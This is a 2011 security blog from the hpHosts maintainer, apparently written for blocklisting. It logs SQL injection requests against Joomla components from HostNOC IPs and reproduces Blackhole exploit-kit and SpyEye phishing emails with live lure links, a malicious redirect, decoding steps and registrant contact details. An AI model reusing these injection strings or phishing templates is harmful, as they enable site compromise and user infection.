Blog for hpHosts, and whatever else I feel like writing about ....

Saturday, 31 December 2011

Happy New Year!

I know it's not 2012 everywhere yet, but it is here, so happy new year everyone!.

2011 has been an exceptionally strange, and sometimes downright frustrating year, and I doubt 2012 will be any different as I don't forsee some of the hosting companies/registrars attitudes changing, nor do I see ICANN or Ripe/Arin et al, getting off their backside and doing their damn job for a change.

However, 2011 has for the most part, been outstandingly great. Lots of badness has been taken offline, a whole plethora of criminal "hosts" (and I use the quotes deliberately, as most were just resellers of resellers) have been taken down (though a quick look on any of the blackhat forums will show there's plenty more to go), and myself and others, will continue taking them offline where we can, and continue to badger the AS'/registrars/ICANN and the registries, that decide they want to continue providing space and domains to criminals.

Friday, 30 December 2011

hpHOSTS - UPDATED 29th December 2011

The hpHOSTS Hosts file has been updated. There is now a total of 230,392 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 29/12/2011 00:15
  2. Last Verified: 28/12/2011 22:33
Download hpHosts now!
http://hosts-file.net/?s=Download

Wednesday, 28 December 2011

hpHosts server issues

Due to technical problems, the hpHosts server including the site and forums, will be down for a few hours.

My apologies for any inconvenience.

Wednesday, 21 December 2011

Ransomware impersonating law enforcement

Ransomware, the practice of providing fake notifications that “you’re infected” and then selling a fake solution that removes the fake malware they just installed, has been a boon for scammers. Now, they’re taking it a step farther, and throwing in a law enforcement scare.

This time, an official-looking banner pops up, purporting to be from various law enforcement agencies, localized by region, and locks down a user’s data unless they act. The malware seems to be highly localized, targeting specific language groups and matching that against localized law enforcement body names. So if you’re in Germany, you get a pop-up purporting to come from the “German Federal Police”, but in the UK you’d get a notice from the “Metropolitan Police.”

This is the sort of localized threat Sebastian wrote about recently as a prediction for 2012. By localizing attacks, they can seem more real and have a higher “success” rate, because they seem more relevant to users in a given region.


Read more

http://blog.eset.com/2011/12/21/ransomware-stoops-to-new-lows-%e2%80%93-fake-law-enforcement

Friday, 9 December 2011

Dear HostNOC - your servers are attacking a friend!

I am assisting a friend at present, with an issue involving IPs constantly attacking his servers, and noted during one of his recent updates, that alot of them were HostNOC - turns out, there's quite the list of them (ignoring the others from known criminal networks). All are RFI etc, and all are already being blocked by ZBBlock (a script written by my friend Zaphod).

The problem here, is HostNOCs (aka Burst.Net) lack of ability in both detecting malicious traffic originating inside their own network, and the sheer amount of frustration in dealing with their abuse department, both via e-mail, and via phone.

I'm in the midst of determining whether these are dedicated criminal servers, or compromised servers (I'm already aware of several black hat "hosts" that have space within HostNOC/Burst IP space, most of course, being run by kids that frequent hackforums.net and the like), but in the meantime, for those of you that want the list of IPs and see what they're doing, the following is the log data for them;

Date    IP    PTR    Attack Pattern
09/Dec/2011:07:21:07 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_simpleshop&Itemid=41&cmd=section§ion=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:26:38 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:09:46:07 -0600]    173.212.197.54    mail.wizzsolutions.com    GET /index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:30:58 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:55:00 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:02 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_musica&Itemid=172&tasko=viewo&task=view2&id=-4214%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:08:48:52 -0600]    173.212.209.244    air2.jetthost.net    GET /index.php?option=com_propiedades&task=search&id_provincia=0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:32:46 -0600]    173.212.227.12    173-212-227-12.static.hostnoc.net    GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:03:34 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_most&mode=email&secid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0000%2C0x33633273366962%2C2222%2C3333%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:00:37 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:13:45:23 -0600]    173.212.227.54    173-212-227-54.static.hostnoc.net    GET /index.php?option=com_kbase&view=article&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:56 -0600]    173.212.235.34    srvs.us    GET /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:12:43 -0600]    173.212.235.62    173-212-235-62.static.hostnoc.net    GET /index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C10%2C11%2C0%2C0%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:58:41 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=com_mad4joomla&jid=-2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:54:31 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=faq&task=viewallfaq&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:35:28 -0600]    173.212.254.44    platon.yapitasi.com    GET /index.php?option=com_directory&page=viewcat&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:03:06 -0600]    64.191.99.110    64-191-99-110.static.hostnoc.net    GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0x33633273366962%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:21:46 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&results=joomla&objid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:16:48:42 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:43:25 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:51:31 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:09:29:10 -0600]    66.197.227.170    66-197-227-170.static.hostnoc.net    GET /index.php?option=com_gallery&Itemid=0&func=detail&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:46:14 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:52:30 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:16:24:45 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_rapidrecipe&category_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:05:34 -0600]    96.9.173.40    96-9-173-40.static.hostnoc.net    GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:13:59:52 -0600]    96.9.173.48    96-9-173-48.static.hostnoc.net    GET /index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C1%2C2%2C3%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:17:43:44 -0600]    96.9.173.58    96-9-173-58.static.hostnoc.net    GET /index.php?option=com_jmovies&Itemid=29&task=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1


The plain IP list;

173.212.195.142
173.212.197.54
173.212.209.228
173.212.209.244
173.212.227.12
173.212.227.38
173.212.227.54
173.212.235.34
173.212.235.62
173.212.254.12
173.212.254.44
64.191.99.110
64.191.99.120
66.197.227.156
66.197.227.170
66.197.227.185
96.9.173.40
96.9.173.48
96.9.173.58


This of course, doesn't cover the rest of the malicious content across HostNOC/Burst IP space - but that's for another time.

Blackhole exploit: For those wondering, Part 4 - Now its Amazons turn

This one came in whilst I was asleep, no JS MITMs this time, just the link in the e-mail that uses a meta refresh to redirect you to the domain housing the Blackhole exploit itself;

Hello,

Shipping Confirmation
Order # 651-5411744-0155168 <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html>

Your estimated delivery date is:
Tuesday, December 13, 2011

Track your package <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> on Amazon.com <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

Shipment Details

Omron WFB-387U Fat Loss Monitor, Black $129.95
Item Subtotal: $129.95
Shipping & Handling: $0.00
Total Before Tax: $129.95
Shipment Total: $129.95
Paid by Visa: $129.95

You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.

Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

We hope to see you again soon!
Amazon.com


<html><header><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://certerpen.info/main.php?page=525447c096f8efbf"></header></html><!-- f851b407dc236b90d847a111101a9a44e2556d0bdbfd2bc92ce43c40 -->


Headers:

Return-Path: <revenueku82@iicbelgium.com>
Delivered-To: services@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 8.476
X-Spam-Level: ********
X-Spam-Status: Yes, score=8.476 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, FH_FAKE_RCVD_LINE=1.778,
FORGED_MUA_OUTLOOK=1.927, FORGED_OUTLOOK_HTML=0.021,
FORGED_OUTLOOK_TAGS=0.052, HK_RANDOM_FROM=0.999, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, HTML_NONELEMENT_30_40=0.001,
MIME_HTML_ONLY=0.723, MIME_HTML_ONLY_MULTI=0.001,
MISSING_MIMEOLE=1.899, MPART_ALT_DIFF=0.79, RCVD_DOUBLE_IP_SPAM=1.808,
SPF_PASS=-0.001] autolearn=no
Received: from mail.mdmcommercial.com (mail.mdmcommercial.com [65.212.113.54])
by mail4.emailconfig.com (Postfix) with ESMTP id 4B607398367
for <services@it-mate.co.uk>; Fri, 9 Dec 2011 14:11:08 +0000 (GMT)
Message-ID: <BIZSSKOTQKLKBTZFODELFMIHZG9SrHPOO609002tchxqbox@madhuri.com>
From: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
Reply-To: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
To: <services@it-mate.co.uk>
Subject: [SPAM] Your Amazon.com order of "Omron WFB-387U Fat Loss ..." has
shipped!
Date: Fri, 9 Dec 2011 09:11:38 -0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="-----=2974_0591_72ZQJO398Y43.28BQ175EI"
X-Priority: 3
X-MSMail-Priority: Normal



Host: certerpen.info
IP: 91.195.11.42
IP PTR: Resolution failed
ASN: 43479 91.195.10.0/23 UKRNIC-AS Ukrstar

No surprises as far as the ASN of course;

inetnum: 91.195.10.0 - 91.195.11.255
netname: UKRSTAR-NET
descr: UkrStar ISP
descr: www.ukrstar.com
country: UA
org: ORG-UA98-RIPE
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: UKRNIC-MNT
mnt-routes: UKRNIC-MNT
mnt-domains: UKRNIC-MNT
source: RIPE # Filtered

organisation: ORG-UA98-RIPE
org-name: UkrStar
org-type: OTHER
descr: www.ukrstar.com
address: Dal'nitskaya 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
fax-no: +380482324245
e-mail: noc@ukrstar.com
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
mnt-ref: GLOBALNETWORKS-MNT
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Sanin Sergey Victorovich
address: Deribasovskaya str., 12
address: Odessa 65027
address: Ukraine
phone: +380487771551
e-mail: ser-0@clan-0.com
nic-hdl: SER50-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Grigoretskiy Sergey Aalexandrovich
org: ORG-UA98-RIPE
address: Dal'nitskaya str., 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
e-mail: sg@ukrstar.com
nic-hdl: WIRE88-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

:: Information related to '91.195.10.0/23AS43479'

route: 91.195.10.0/23
descr: UKRNIC-IP-BLOCK
origin: AS43479
mnt-by: UKRNIC-MNT
source: RIPE # Filtered


I've had a few more of the ACH ones with the JS MITMs too, this time, the domain housing the payload, was;

Host: wonderfulwreath.com
IP: 46.45.137.205
IP PTR: 46-45-137-205.turkrdns.com
ASN: 42926 46.45.137.0/24 RADORE Radore Hosting Telekomunikasyon Hizmetleri San. ve Tic. Ltd. Sti.

References

Blackhole exploit: For those wondering, Part 3 - Fake Facebook e-mail
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_08.html

Blackhole exploit: For those wondering, Part 2
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_05.html

Blackhole exploit: For those wondering
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering.html

Deobfuscate exploit kits using Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=4636

Thursday, 8 December 2011

Blackhole exploit: For those wondering, Part 3 - Fake Facebook e-mail

This one came in an e-mail claiming to be from Facebook, with the usual social engineering rubbish;

facebook <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271>
Hi,
You haven't been back to Facebook recently.You have received notifications while you were gone.
<http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/I-6WhcLLGrb.gif> 1 message <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271> <http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/jqa4zOmDxSP.gif> 2 friend requests <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271>
Thanks,
The Facebook Team
Sign in to Facebook and start connecting
Sign in <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271>

To log in to Facebook, follow the link below:
http://www.facebook.com/n/?find-friends%2F&mid=4131bdcG5af38cf3b00cG0G2b&bcode=BoDkTqHx&n_m=redc-mosul%40imfi.org <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271>
<http://www.facebook.com/email_open_log_pic.php?mid=4131bdcG5af38cf3b00cG0G2b>
If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, you can unsubscribe <http://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271> .
Facebook, Inc. P.O. Box 10005, Palo Alto, CA 94303


Or for those of you using HTML e-mail (naughty naughty!);



In line with keeping this basic, for those of you not familiar with decoding these, and not wanting to run them - to decoded this latest variant, change;

window["eval"](c);


To;

eval(c);


Then comment out the following lines (I've used screenshots for these, to save your AVs going nuts);

Lines 1 and 2



Line 4



Then finally;

Line 13



Add this, just after line 13;

w=String;


Once the changes are made, simply run it in Malzilla, and you'll see the lovely mess of code in the bottom box;



Simply copy this, paste it into the top box (where the original code was - and remember to CLEAR THE CONTENTS OF THAT FIRST!), or create a new decoder tab. Click Format Code, and voila - from here you simply look for the magic ?f=, and you've got the variable you need.

As an aside, these are blocking JSUnpack/Wepawet et al now it seems.

Headers for the e-mail, for those that want them;

Return-Path: <update+zj4ougb438j9jy@2t4bv271.facebook-email.com>
Delivered-To: darren@it-mate.co.uk
X-Spam-Flag: NO
X-Spam-Score: 1.065
X-Spam-Level: *
X-Spam-Status: No, score=1.065 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, HTML_MESSAGE=0.001, MIME_HTML_ONLY=0.723,
MIME_HTML_ONLY_MULTI=0.001, MPART_ALT_DIFF=0.79,
RCVD_IN_BRBL_LASTEXT=1.449, WEIRD_PORT=0.001] autolearn=no
Received: from server.longchin.com (longchin.com [152.104.144.211])
by mail4.emailconfig.com (Postfix) with ESMTP id 8E76339836C
for <darren@it-mate.co.uk>; Fri, 9 Dec 2011 06:14:22 +0000 (GMT)
Received: from mail.alpinspire.com ([71.33.236.177]) by server.longchin.com with Microsoft SMTPSVC(6.0.3790.4675);
Fri, 9 Dec 2011 14:16:10 +0800
Content-Type: multipart/alternative; boundary="===============0677422325=="
MIME-Version: 1.0
Subject: 2 friends awaiting your response.
From: "Facebook" <update+zj4ougb438j9jy@2t4bv271.facebook-email.com>
Message-ID: <SERVERhGD1XyCTr9rf30000f583@server.longchin.com>
X-OriginalArrivalTime: 09 Dec 2011 06:16:11.0375 (UTC) FILETIME=[0C11BFF0:01CCB63A]
Date: 9 Dec 2011 14:16:11 +0800
To: undisclosed-recipients:;


parahole.ru itself, is housed at;

IP: 91.213.8.118
IP PTR: s118.justhost.in.ua
ASN: 15626 91.213.8.0/24 ITLAS ITL Company

Unless you've got a specific reason not to, you can safely block this entire /24.

inetnum: 91.213.8.0 - 91.213.8.255
netname: OPRIA
descr: FOP Opria Ruslan Dmitrievich
country: UA
org: ORG-ORD1-RIPE
admin-c: ORD4-RIPE
tech-c: ORD4-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-OPRIA
mnt-routes: MNT-OPRIA
mnt-routes: ITL-MNT
mnt-domains: MNT-OPRIA
source: RIPE # Filtered

organisation: ORG-ORD1-RIPE
org-name: FOP Opria Ruslan Dmitrievich
org-type: OTHER
address: 91002, 2-nd Partizansky side street 36, Lugansk, Ukraine
phone: +380677955035
abuse-mailbox: abuse@justhost.in.ua
mnt-ref: MNT-OPRIA
mnt-by: MNT-OPRIA
source: RIPE # Filtered

person: Opria Ruslan Dmitrievich
address: 91002, 2-nd Partizansky side street 36, Lugansk, Ukraine
phone: +380677955035
abuse-mailbox: abuse@justhost.in.ua
nic-hdl: ORD4-RIPE
mnt-by: MNT-OPRIA
source: RIPE # Filtered

% Information related to '91.213.8.0/24AS15626'

route: 91.213.8.0/24
descr: XSERVER
origin: AS15626
mnt-by: ITL-MNT
source: RIPE # Filtered


URLs for this one;

hxxp://static77-68-16-117.live-dsl.net:8887/facebook-friend1/2t4bv271
hxxp://static77-68-16-117.live-dsl.net:8887/facebook2/
hxxp://static77-68-16-117.live-dsl.net:8887/11mozilla/
hxxp://parahole.ru/main.php?page=2f20caeff255a186
hxxp://parahole.ru/content/1ddfp.php?f=29
hxxp://parahole.ru/content/2ddfp.php?f=29
hxxp://parahole.ru/content/hcp_vbs.php?f=29&d=0
hxxp://parahole.ru/
hxxp://parahole.ru/w.php?e=7&f=29


MD5 for the payload (SpyEye trojan of course, same as the last): 162d507cead24c6e184ea83be33fc209

References

Blackhole exploit: For those wondering, Part 2
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_05.html

Blackhole exploit: For those wondering
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering.html

Fake Firefox e-mail leading to SpyEye trojan

This little chap arrived in my spam box today, and almost got over-looked (I was checking the newest e-mails leading to the Blackhole exploit (one of which, couldn't decide if it was from LinkedIn or the FDIC)), and not surprisingly, is fake.

The Payload, all 593KB of it, infects the unwitting victim with the SpyEye trojan. VT detection is utterly rubbish of course - only 2 vendors detecting it.

http://www.virustotal.com/file-scan/report.html?id=5aad76afe0ee8121bd53d8137f6542ae56ac30ec34a9e6da19310d452093ad10-1323373580

Quite why Sophos is calling it Ropian, is puzzling.

The URL you're linked to, is on a FastHosts IP, and redirects to a different folder on the same server, to download the actual payload.

hxxp://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy
--> hxxp://static77-68-16-117.live-dsl.net:8887/upd4/firefox-8.0.1.exe


IP: 77.68.16.117
IP PTR: static77-68-16-117.live-dsl.net
ASN: 15418 77.68.0.0/17 FASTHOSTS-INTERNET Fasthosts Internet Ltd. Gloucester, UK

E-mail body (for those of us that use plain text)

Facebook <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

<http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

Facebook recommends that you upgrade to the
faster and smarter Firefox 8.

Get It Now <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

Introducing the new and improved Firefox 8, optimized for Facebook

• Browse faster than the previous version of Firefox.

• Easily organize and arrange your tabs into groups.

• Get on-the-go access to your saved Firefox settings across multiple computers.

• Access the new Facebook features as profile viewers and much more!

Get your free upgrade now <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy> .

Already upgraded? Thank you.

Facebook

All your favorite stuff, all in one place. Make Facebook your home <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy> .

Visit Firefox on Facebook   <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

Share:  <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy> <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy> <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

Mozilla, Firefox, and the Firefox logo are trademarks or registered trademarks of Mozilla..

Update Marketing Preferences <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>    |   Privacy Policy <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>    |    Web Beacons in Email <http://static77-68-16-117.live-dsl.net:8887/firefox-update1/pi73rjvy>

RefID: sr-12012817



E-mail headers:

Return-Path: <updater@pi73rjvy.firefoxx.com>
Delivered-To: darren@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 1.443
X-Spam-Level: *
X-Spam-Status: Yes, score=1.443 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, HTML_MESSAGE=0.001, HTML_MIME_NO_HTML_TAG=0.377,
MIME_HTML_ONLY=0.723, MIME_HTML_ONLY_MULTI=0.001, MPART_ALT_DIFF=0.79,
